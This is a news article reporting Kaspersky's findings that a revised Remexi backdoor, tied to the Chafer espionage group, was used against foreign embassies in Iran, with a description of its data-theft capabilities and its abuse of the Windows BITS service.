Remexi Trojan and Chafer cyber-espionage gang bear inter-connection in attacks targeting foreign embassies

Security researchers from Kaspersky Lab recently found several attempts by alleged cyber-criminals to contaminate offshore embassies inside Iran by installing onto their systems homebrew spyware. Apparently, a revised Remexi backdoor was used for the cyber assaults. A number of authentic tools too were utilized within the campaign.

Explaining the function of Remexi, Kaspersky says it's one kind of Trojan which creates certain backdoor enabling remote access to the contaminated system. There's seemingly an association between Remexi and Chafer one presumably cyber-espionage gang speaking Farsi language. Chafer was earlier tied to cyber-surveillance targeting people inside the Middle East. The revised Remexi Trojan has been detected as Trojan.Win32.Agent and Trojan.Win32.Remexi. According to Kaspersky, the gang attacking embassies possibly suggests it's trying to make one fresh focus.

Denis Legezo of Kaspersky says Remexi has the capability of exfiltrating history and cookies the kind of data related to Web-browsers, screenshots, and keystrokes, decrypted whenever feasible. The cyber-criminals depend immensely upon Microsoft technologies when working from either sides -server or client. Thus the malware utilizes regular Windows utilities one of them being Microsoft BITS (Background Intelligent Transfer Service) through the bitsadmin.exe file for obeying instructions and thereafter exfiltrating data, Legezo explains. www.theregister.co.uk posted this, January 31, 2019.

Remexi's original detection reportedly, happened during 2015. The Trojan employed within the latest outbreak bears likeness in terms of code with earlier familiar samples of it. Its similarity is also with respect to victims targeted, indicating certain connection with Chafer. The most recent sample can issue commands remotely while capture browser data, screenshots, along with typed text etc.

Interestingly, nobody knows the malware's exact objective; however, Kaspersky researchers feel Remexi's infections are related to one domestic espionage scheme which looks for monitoring everything foreign diplomats do within the Middle East. Aside attacking offshore embassies, Kaspersky found evidences such as encryption keys crafted with Farsi language which indicate Iranian operatives could be responsible for the espionage campaign.

Iran, particularly, has been doing plentiful online espionage lately. Whilst the country's government employs its malware to carry out surveillance/espionage, the gangs greatly concentrate on schemes through social media which seek for progressing political interests of the country.

» SPAMfighter News - 2/6/2019